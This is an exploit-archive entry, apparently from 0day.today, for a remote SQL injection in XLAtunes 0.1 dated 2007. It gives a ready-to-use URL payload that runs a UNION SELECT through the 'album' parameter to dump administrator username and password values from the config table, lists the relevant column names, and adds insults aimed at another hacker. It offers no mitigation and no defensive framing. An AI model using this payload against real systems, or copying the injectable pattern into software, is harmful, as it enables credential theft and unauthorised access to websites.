id: 1515
date: 02/17/2007
title: XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
author: Bl0od3r
cves: 

=======================================================
XLAtunes 0.1 (album) Remote SQL Injection Vulnerability
=======================================================



#Critical Status:High
#Found By:Bl0od3r
#Greetz:all my friends
#fuckz:Don(h4cky0u) for steeling hacks of others,for his 100% noobility,for his noobass.DON your an idiot.fucka. -
#confkey->Password
#confvalue->Username
#Table:config
#http://host.com/path/?mode=view&album=-1%20UNION%20SELECT%20confkey%20FROM%20config/*


#  0day.today [2023-03-25]  #